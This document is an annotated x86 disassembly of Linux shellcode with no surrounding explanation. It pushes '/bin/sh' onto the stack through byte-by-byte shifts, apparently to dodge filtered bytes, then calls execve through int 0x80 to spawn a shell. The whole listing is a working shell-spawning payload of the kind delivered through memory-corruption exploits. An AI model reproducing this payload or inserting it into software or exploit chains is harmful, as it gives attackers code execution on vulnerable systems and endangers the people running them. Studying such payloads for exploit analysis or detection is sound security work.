0:  b0 00                   mov    al,0x0  ; Push "/bin/sh\x00" onto the stack
2:  d1 e0                   shl    eax,1
4:  d1 e0                   shl    eax,1
6:  d1 e0                   shl    eax,1
8:  d1 e0                   shl    eax,1
a:  d1 e0                   shl    eax,1
c:  d1 e0                   shl    eax,1
e:  d1 e0                   shl    eax,1
10: d1 e0                   shl    eax,1
12: b0 68                   mov    al,0x68
14: d1 e0                   shl    eax,1
16: d1 e0                   shl    eax,1
18: d1 e0                   shl    eax,1
1a: d1 e0                   shl    eax,1
1c: d1 e0                   shl    eax,1
1e: d1 e0                   shl    eax,1
20: d1 e0                   shl    eax,1
22: d1 e0                   shl    eax,1
24: b0 73                   mov    al,0x73
26: d1 e0                   shl    eax,1
28: d1 e0                   shl    eax,1
2a: d1 e0                   shl    eax,1
2c: d1 e0                   shl    eax,1
2e: d1 e0                   shl    eax,1
30: d1 e0                   shl    eax,1
32: d1 e0                   shl    eax,1
34: d1 e0                   shl    eax,1
36: b0 2f                   mov    al,0x2f
38: 50                      push   eax
39: 90                      nop
3a: b0 6e                   mov    al,0x6e
3c: d1 e0                   shl    eax,1
3e: d1 e0                   shl    eax,1
40: d1 e0                   shl    eax,1
42: d1 e0                   shl    eax,1
44: d1 e0                   shl    eax,1
46: d1 e0                   shl    eax,1
48: d1 e0                   shl    eax,1
4a: d1 e0                   shl    eax,1
4c: b0 69                   mov    al,0x69
4e: d1 e0                   shl    eax,1
50: d1 e0                   shl    eax,1
52: d1 e0                   shl    eax,1
54: d1 e0                   shl    eax,1
56: d1 e0                   shl    eax,1
58: d1 e0                   shl    eax,1
5a: d1 e0                   shl    eax,1
5c: d1 e0                   shl    eax,1
5e: b0 62                   mov    al,0x62
60: d1 e0                   shl    eax,1
62: d1 e0                   shl    eax,1
64: d1 e0                   shl    eax,1
66: d1 e0                   shl    eax,1
68: d1 e0                   shl    eax,1
6a: d1 e0                   shl    eax,1
6c: d1 e0                   shl    eax,1
6e: d1 e0                   shl    eax,1
70: b0 2f                   mov    al,0x2f
72: 50                      push   eax
73: 90                      nop
74: 54                      push   esp      ; ebx -> "/bin/sh\x00"
75: 5b                      pop    ebx
76: 31 c0                   xor    eax,eax  ; eax = 0xb
78: b0 0b                   mov    al,0xb
7a: 31 c9                   xor    ecx,ecx  ; ecx = 0x0
7c: 31 d2                   xor    edx,edx  ; edx = 0x0
7e: cd 80                   int    0x80